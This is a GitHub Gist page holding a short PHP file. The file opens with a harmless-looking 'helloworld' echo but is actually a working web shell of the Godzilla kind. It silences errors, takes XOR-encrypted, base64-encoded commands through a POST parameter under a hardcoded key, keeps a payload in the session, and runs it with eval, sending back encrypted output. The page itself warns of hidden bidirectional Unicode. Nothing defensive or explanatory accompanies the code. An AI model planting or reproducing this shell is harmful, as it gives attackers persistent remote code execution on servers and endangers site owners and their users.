Created
May 23, 2024 04:26
-
-
Save sunfkny/737005d39bf1c046faa977f2b9222cc8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
echo("hello"."world"); | |
@session_start(); | |
@set_time_limit(0); | |
@error_reporting(0); | |
function encode($D,$K){ | |
for($i=0;$i<strlen($D);$i++) { | |
$c = $K[$i+1&15]; | |
$D[$i] = $D[$i]^$c; | |
} | |
return $D; | |
} | |
$pass='pass1'; | |
$payloadName='payload'; | |
$key='c2add694bf942dc7'; | |
if (isset($_POST[$pass])){ | |
$data=encode(base64_decode($_POST[$pass]),$key); | |
if (isset($_SESSION[$payloadName])){ | |
$payload=encode($_SESSION[$payloadName],$key); | |
if (strpos($payload,"getBasicsInfo")===false){ | |
$payload=encode($payload,$key); | |
} | |
eval($payload); | |
echo substr(md5($pass.$key),0,16); | |
echo base64_encode(encode(@run($data),$key)); | |
echo substr(md5($pass.$key),16); | |
}else{ | |
if (strpos($data,"getBasicsInfo")!==false){ | |
$_SESSION[$payloadName]=encode($data,$key); | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment